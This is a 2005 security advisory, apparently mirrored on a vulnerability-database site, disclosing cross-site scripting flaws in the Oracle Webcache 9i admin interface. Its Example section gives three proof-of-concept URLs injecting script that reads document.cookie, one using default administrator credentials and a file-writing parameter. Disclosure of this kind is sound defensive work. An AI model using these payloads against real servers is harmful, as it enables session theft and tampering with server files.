Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:8461
HistoryApr 28, 2005 - 12:00 a.m.

Cross Site Scripting in Oracle Webcache 9i

2005-04-2800:00:00
vulners.com
5
JSON

Name Cross Site Scripting in Oracle Webcache 9i
Systems Affected Oracle Application Server with Webcache 9i
Severity Low Risk
Category Cross Site Scripting
Vendor URL http://www.oracle.com
Author Alexander Kornbrust (ak at red-database-security.com)
Date 26 Apr 2005 (V 1.00)
Advisory AKSEC2003-011
Time to fix ?? days

Details
Many parameters are vulnerable against XSS/CSS attacks. Together with this bug it is possible to corrupt an Oracle Application Server installation.

Example
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script>
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2
http://administrator:administrator@server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script>

Patch Information
Oracle fixed these issues with informing me or their customers.

History
23-sep-2003 Oracle secalert was informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory

Ā© 2005 by Red-Database-Security GmbH

JSON